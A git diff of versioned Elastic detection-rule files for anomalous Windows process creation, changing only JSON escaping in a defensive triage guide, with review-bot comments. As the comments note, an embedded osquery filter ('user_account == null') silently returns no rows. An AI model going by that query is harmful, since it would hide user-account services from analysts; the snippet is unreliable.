diff --git a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_102.json b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_102.json
index ae8cd0f0794..478cb83a31d 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_102.json
@@ -15,7 +15,7 @@ "v3_windows_anomalous_process_creation" ], "name": "Anomalous Windows Process Creation", - "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. 
Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
@@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_103.json b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_103.json index d59b151dc6a..ddd5342df96 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_103.json 
@@ -15,7 +15,7 @@ "v3_windows_anomalous_process_creation" ], "name": "Anomalous Windows Process Creation", - "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- 
Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. 
These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the 
PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
"references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ],
@@ -33,7 +33,7 @@
], "threat": [ {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": { "id": "TA0003", "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_104.json b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_104.json
index b33aa1cd584..3432b4c2f83 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_104.json
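Review bot: The `Osquery - Retrieve Services Running on User Accounts` query embedded in the new `note` text of the `_103` file never returns a row: osquery runs on SQLite, where `user_account == null` evaluates to NULL, so for any account that is not LocalSystem/LocalService/NetworkService the predicate becomes `NOT (0 OR 0 OR NULL)` = NULL and the WHERE clause discards the row, while genuinely NULL accounts are discarded too. The null test should be `user_account IS NULL`, and the neighbouring label `Retrieve Service Unisgned Executables with Virustotal Link` should read `Unsigned`. This hunk only re-encodes `\u003e` as `>`, so the defect predates it; if these versioned rule artifacts are meant to be immutable snapshots, the fix belongs in the rule source and a new rule revision rather than in this file.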
@@ -15,7 +15,7 @@ "v3_windows_anomalous_process_creation" ], "name": "Anomalous Windows Process Creation", - "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- 
Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. 
These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the 
PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
"references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ],
@@ -33,7 +33,7 @@
], "threat": [ {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
"tactic": { "id": "TA0003", "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_105.json b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_105.json
index 10199a27456..bcf840943c3 100644
--- a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_105.json
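Review bot: The `_104` revision carries the same broken osquery in its new `note` text: `WHERE NOT (... OR user_account == null)` uses SQLite's `== null`, which yields NULL rather than true/false, so the `NOT (...)` is NULL for every row that is not LocalSystem/LocalService/NetworkService and the "Services Running on User Accounts" query returns nothing; an analyst following the guide would wrongly conclude no such services exist. Change the null test to `user_account IS NULL` and fix the label typo `Unisgned` to `Unsigned`. Since this hunk only changes the JSON escaping of `>`, the defect is pre-existing and, given that these are versioned snapshots, presumably should be corrected in the rule source and shipped as a new revision.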
